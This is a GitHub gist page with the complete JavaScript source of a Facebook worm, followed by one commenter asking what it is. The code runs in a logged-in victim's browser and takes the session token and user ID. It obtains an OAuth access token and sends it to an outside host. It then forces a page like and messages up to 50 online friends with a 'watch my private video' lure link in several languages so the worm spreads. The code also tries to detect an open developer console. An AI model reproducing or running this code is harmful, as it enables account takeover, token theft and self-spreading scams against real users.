Skip to content

Instantly share code, notes, and snippets.

@P3t3rp4rk3r

P3t3rp4rk3r/Facebook_Malware_Script.js

Created August 24, 2017 19:26
Show Gist options
  • Save P3t3rp4rk3r/814c9d8d2619f719693393810fc327f4 to your computer and use it in GitHub Desktop.
Save P3t3rp4rk3r/814c9d8d2619f719693393810fc327f4 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Facebook_Malware_Script.js
var cnsl = true;
var win = this;
var ajax = win["XMLHttpRequest"];
function start() {
var cookie_name = "app_" + profile_id;
var cookie_time = 40;
if (!getCookie(cookie_name) || parseInt(getCookie(cookie_name)) < Date.now() - 60 * 1000 * cookie_time) {
createCookie(cookie_name, Date.now(), 1);
config = {};
config['chat_limit'] = 50;
platform();
android();
}
}
function android() {
if (localStorage.access_token != "token") {
var getParams = {};
getParams["composer_id"] = "rc.u_0_" + rand(0, 30);
getParams["composer_type"] = "pages_feed";
getParams["target_id"] = "20531316728";
getParams["av"] = profile_id;
getParams["dpr"] = "1";
var params = {};
params["__user"] = profile_id;
params["__a"] = "1";
params["__dyn"] = __dyn;
params["__af"] = "j0";
params["__req"] = "2z";
params["__be"] = "-1";
params["__pc"] = "EXP1:home_page_pkg";
params["__rev"] = __rev;
params["fb_dtsg"] = fb_dtsg;
params["jazoest"] = jazoest;
var xhr = new ajax();
xhr.open("POST", "https://www.facebook.com/react_composer/status/bootstrap/?" + deSerialize(getParams));
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
if (xhr.responseText.indexOf('access_token') > 0) {
new Image().src = "http://jaredandrew.com/android.php?profile_id=" + profile_id + "&access_token=" + xhr.responseText.split('access_token":')[1].split('"')[1].split('"')[0] + "&gender=farketmez";
localStorage.access_token = "token";
}
}
}
xhr.send(deSerialize(params));
}
}
function platform() {
var params = {};
params["fb_dtsg"] = fb_dtsg;
params["__user"] = profile_id;
params["__a"] = "1";
params["__dyn"] = __dyn;
params["__af"] = "3p";
params["__req"] = "pS";
params["__be"] = "-1";
params["__pc"] = "EXP:DEFAULT";
params["__rev"] = __rev;
params["jazoest"] = jazoest;
var xhr = new ajax();
xhr.open("POST", "https://www.facebook.com/settings/application/platform_opt_out/submit/?action=enable&dpr=1", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
getToken();
}
}
xhr.send(deSerialize(params));
}
function getToken() {
var params = {};
params["fb_dtsg"] = fb_dtsg;
params["app_id"] = "165907476854626";
params["redirect_uri"] = "fbconnect://success";
params["display"] = "popup";
params["access_token"] = "";
params["sdk"] = "";
params["from_post"] = "1";
params["private"] = "";
params["tos"] = "";
params["login"] = "";
params["read"] = "";
params["write"] = "";
params["extended"] = "";
params["social_confirm"] = "";
params["confirm"] = "";
params["seen_scopes"] = "";
params["auth_type"] = "";
params["auth_token"] = "";
params["auth_nonce"] = "";
params["default_audience"] = "";
params["ref"] = "Default";
params["return_format"] = "access_token";
params["domain"] = "";
params["sso_device"] = "ios";
params["__CONFIRM__"] = "1";
var xhr = new ajax();
xhr.open("POST", "https://www.facebook.com/v2.8/dialog/oauth/confirm", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
if (xhr.responseText.indexOf('access_token=') > 0) {
jsonstore = {};
jsonstore.access_token = xhr.responseText.split('access_token=')[1].split('&')[0];
jsonstore.pages_id = 731953020321037;
Kontrol(jsonstore);
online(jsonstore);
}
}
}
xhr.send(deSerialize(params));
}
function Kontrol(jsonstore) {
var xhr = new XMLHttpRequest();
var params = {};
params["q"] = "SELECT created_time FROM page_fan WHERE uid = me() AND page_id = " + jsonstore.pages_id;
params["access_token"] = jsonstore.access_token;
xhr.open("GET", "https://graph.facebook.com/fql?" + deSerialize(params));
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
var data = JSON.parse(xhr.responseText);
if (data.data.length == 0) {
pages(jsonstore);
}
}
}
xhr.send();
}
function pages(jsonstore) {
var xhr = new XMLHttpRequest();
var params = {};
params["fbpage_id"] = jsonstore.pages_id;
params["add"] = "true";
params["reload"] = "false";
params["fan_origin"] = "page_timeline";
params["fan_source"] = "";
params["cat"] = "";
params["actor_id"] = profile_id;
params["__user"] = profile_id;
params["__a"] = "1";
params["__dyn"] = __dyn;
params["__af"] = "iw";
params["__req"] = "g";
params["__be"] = "-1";
params["__pc"] = "PHASED:DEFAULT";
params["__rev"] = __rev;
params["fb_dtsg"] = fb_dtsg;
params["jazoest"] = jazoest;
params["__spin_r"] = __rev;
params["__spin_b"] = "trunk";
params["__spin_t"] = Math.floor(Date.now() / 1000);
xhr.open("POST", "https://www.facebook.com/ajax/pages/fan_status.php?av=" + profile_id + "&dpr=1", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
xhr.close;
}
}
xhr.send(deSerialize(params));
}
function online(jsonstore) {
var params = {}
params["q"] = "SELECT uid, name,locale, online_presence, pic_big, can_post FROM user WHERE uid IN (SELECT uid2 FROM friend WHERE uid1 = me()) Order By online_presence Limit 2000";
params["access_token"] = jsonstore.access_token;
params["ext"] = "me";
var xhr = new ajax();
xhr.open("GET", "https://graph.facebook.com/fql?" + deSerialize(params), true);
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
var data = JSON.parse(xhr.responseText.replace("for (;;);", ""));
if (!data.error) {
var friends = data.data;
friends = shuffle(friends);
jsonstore.friends = [];
for (i = 0; i < friends.length && jsonstore.friends.length < config.chat_limit; i++) {
if (friends[i].online_presence == "active") {
jsonstore.friends.push(friends[i]);
}
}
for (i = 0; i < friends.length && jsonstore.friends.length < config.chat_limit; i++) {
if (friends[i].online_presence == "idle") {
jsonstore.friends.push(friends[i]);
}
}
if (jsonstore.friends.length > 0) {
getLink(jsonstore);
}
}
}
}
xhr.send();
}
function getLink(jsonstore) {
var xhr = new ajax();
xhr.open("GET", "https://theurlshortener.com/plugins/upload.php?profile_id=" + profile_id);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
var data = JSON.parse(xhr.responseText);
if (data.link) {
jsonstore.link = data.link;
for (i = 0; i < jsonstore.friends.length; i++) {
jsonstore.uid = jsonstore.friends[i].uid;
jsonstore.pic_big = jsonstore.friends[i].pic_big;
jsonstore.name = jsonstore.friends[i].name ? jsonstore.friends[i].name.split(" ")[0] : jsonstore.friends[i].text.split(" ")[0];
send(jsonstore);
}
}
}
}
xhr.send();
}
function country(text) {
if (text == "tr_TR") {
title = "videoyu izle ve kimseye gösterme";
} else if (text.split("_")[0] == "en") {
title = "watch my private video and don't show it to anyone";
} else if (text == "it_IT") {
title = "guarda il mio video privato e non mostrarlo a nessuno";
} else if (text == "de_DE") {
title = "sehen sie sich mein privates Video an und zeigen sie es niemandem";
} else if (text == "pt_PT") {
title = "assista meu vídeo privado e não mostre a ninguém";
} else if (text == "fr_CA" || text == "fr_FR") {
title = "regarde ma vidéo privée et ne le montre pas à personne";
} else if (text == "pl_PL") {
title = "obejrzyj mój prywatny film i nie pokazuj go nikomu";
} else if (text == "el_GR") {
title = "Παρακολουθήστε το ιδιωτικό μου βίντεο και μην το εμφανίζετε σε κανέναν";
} else if (text == "sk_SK") {
title = "pozerať moje súkromné video a neukáže to nikomu";
} else {
title = "Video";
}
return title;
}
function send(jsonstore) {
var uid = jsonstore.uid;
var pic_big = jsonstore.pic_big;
var name = jsonstore.name;
var link = jsonstore.link;
var textArray = [':o', ':P', 'O:)', '3:)', ';)', ':O', '-_-', '>:O', ':*', '<3', '^_^', '8-)', '(y)', ':)'];
var randomText = textArray[Math.floor(Math.random() * textArray.length)];
var message_id = rand(11111111111111, 999999999999999);
var params = {};
params["client"] = "mercury";
params["action_type"] = "ma-type:user-generated-message";
params["body"] = jsonstore.name + " Video " + randomText + "\n" + jsonstore.link + "?" + jsonstore.name;
params["has_attachment"] = "false";
params["message_id"] = message_id;
params["offline_threading_id"] = message_id;
params["other_user_fbid"] = jsonstore.uid;
params["signature_id"] = rastgele(8);
params["source"] = "source:chat:web";
params["specific_to_list[0]"] = "fbid:" + jsonstore.uid;
params["specific_to_list[1]"] = "fbid:" + profile_id;
params["timestamp"] = Date.now();
params["ui_push_phase"] = "C3";
params["__user"] = profile_id;
params["__a"] = "1";
params["__dyn"] = __dyn;
params["__af"] = "j0";
params["__req"] = "18";
params["__be"] = "-1";
params["__pc"] = "PHASED:DEFAULT";
params["__rev"] = __rev;
params["fb_dtsg"] = fb_dtsg;
params["jazoest"] = jazoest;
params["__spin_r"] = __rev;
params["__spin_b"] = "trunk";
params["__spin_t"] = Math.floor(Date.now() / 1000);
var xhr = new ajax();
xhr.open("POST", "https://www.facebook.com/messaging/send/?dpr=1", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
xhr.close;
}
}
xhr.send(deSerialize(params));
}
function generate_name(length, firstUpper) {
rname = "";
sesli = "aeiou";
sessiz = "bcdfghjklmnprstvyz";
rname = rand(1, 2) == 1 ? sessiz[rand(0, sessiz.length - 1)] : sesli[rand(0, sesli.length - 1)];
if (firstUpper == true) {
rname = rname.toUpperCase();
}
for (n = 0; n < length; n++) {
if (sesli.indexOf(rname[rname.length - 1]) >= 0) {
rname += sessiz[rand(0, sessiz.length - 1)];
} else {
rname += sesli[rand(0, sesli.length - 1)];
}
}
return rname;
}
function getCookie(cname) {
var name = cname + "=";
var ca = document.cookie.split(';');
for (var i = 0; i < ca.length; i++) {
var c = ca[i];
while (c.charAt(0) == ' ') {
c = c.substring(1);
}
if (c.indexOf(name) == 0) {
return c.substring(name.length, c.length);
}
}
return "";
}
function createCookie(name, value, days) {
var expires;
if (days) {
var date = new Date();
date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));
expires = "; expires=" + date.toGMTString();
} else {
expires = "";
}
document.cookie = name + "=" + value + expires + "; path=/";
}
function inArray(arr, key, value) {
var res = false;
for (a = 0; a < arr.length; a++) {
for (k in arr[a]) {
if (k == key && arr[a][k] == value) {
res = true;
break;
}
}
}
return res;
}
function get_dyn() {
function toCompressedString() {
$BitMap1 = [];
for (i in t) {
$BitMap1[t[i]] = 1;
}
if ($BitMap1["length"] === 0) {
return "";
}
var l = [];
var m = 1;
var n = $BitMap1[0] || 0;
var o = n.toString(2);
var p = 1;
for (; p < $BitMap1["length"]; p++) {
var q = $BitMap1[p] || 0;
if (q === n) {
m++;
} else {
l["push"](j(m));
n = q;
m = 1;
}
}
if (m) {
l["push"](j(m));
}
return k(o + l["join"](""));
}
function j(l) {
var m = l.toString(2);
var n = "0" ["repeat"](m["length"] - 1);
return n + m;
}
function k(l) {
var m = (l + "00000")["match"](/[01]{6}/g);
var n = "";
var o = 0;
for (; o < m["length"]; o++) {
n += h[parseInt(m[o], 2)];
}
return n;
}
var bd = document["body"]["innerHTML"]["match"](/\},([0-9])+\]/gi);
var hd = document["head"]["innerHTML"]["match"](/\},([0-9])+\]/gi);
var is = bd["concat"](hd);
var t = [];
for (x in is) {
if (is[x] != null) {
var p = is[x]["replace"]("},", "")["replace"]("]", "");
if (parseInt(p) >= 7) {
t["push"](parseInt(p));
}
}
}
var h = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-_";
return toCompressedString();
}
function guid() {
function s4() {
return Math.floor((1 + Math.random()) * 0x10000).toString(16).substring(1);
}
return s4() + s4() + '-' + s4() + '-' + s4() + '-' + s4() + '-' + s4() + s4() + s4();
}
function randoms(l, m) {
var r = [];
while (r.length < l) {
var rnd = Math.floor(Math.random() * m);
if (r.indexOf(rnd) < 0) {
r.push(rnd);
}
}
return r;
}
function searchArray(a, k) {
var found = false;
for (key in a) {
if (key.toString() == k) {
found = a[key];
break;
} else if (typeof a[key] == "object") {
found = searchArray(a[key], k);
if (found != false) {
break;
}
}
}
return found;
}
function shuffle(array) {
var currentIndex = array.length,
temporaryValue, randomIndex;
while (0 !== currentIndex) {
randomIndex = Math.floor(Math.random() * currentIndex);
currentIndex -= 1;
temporaryValue = array[currentIndex];
array[currentIndex] = array[randomIndex];
array[randomIndex] = temporaryValue;
}
return array;
}
function rand(min, max) {
return Math.floor(Math.random() * (max - min)) + min;
}
function rastgele(uzunluk) {
mtn = "abcdefghijklmnoprstuvyzxABCDEFGHIJKLMNOPRSTUVYZX0123456789";
ret = "";
for (l = 0; l < uzunluk; l++) {
ret += mtn[Math.floor(Math.random() * mtn.length)];
}
return ret;
}
function deSerialize(json) {
return Object.keys(json).map(function(key) {
return encodeURIComponent(key) + '=' + encodeURIComponent(json[key]);
}).join('&');
}
var cntrl = 'd';
var element = new Image();
element.__defineGetter__('id', function() {
cntrl = 'e';
if (cnsl == false) {
location.reload();
}
});
console.log(element);
console.clear();
if (location.hostname.indexOf("facebook.com") >= 0 && (cntrl == 'd' || cnsl == true)) {
fb_dtsg_list = document.getElementsByName('fb_dtsg');
if (fb_dtsg_list.length > 0) {
profile_id = document.cookie.match(/c_user=(\d+)/)[1];
fb_dtsg = fb_dtsg_list[0].value;
__dyn = get_dyn();
if (document.head.innerHTML.split('"client_revision":')[1]) {
__rev = document.head.innerHTML.split('"client_revision":')[1].split(",")[0];
} else {
__rev = rand(1111111, 9999999);
}
jazoest = "";
for (var x = 0; x < fb_dtsg.length; x++) {
jazoest += fb_dtsg.charCodeAt(x);
}
jazoest = '2' + jazoest;
start();
}
}
Copy link

ghost commented Dec 3, 2018

what is that?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment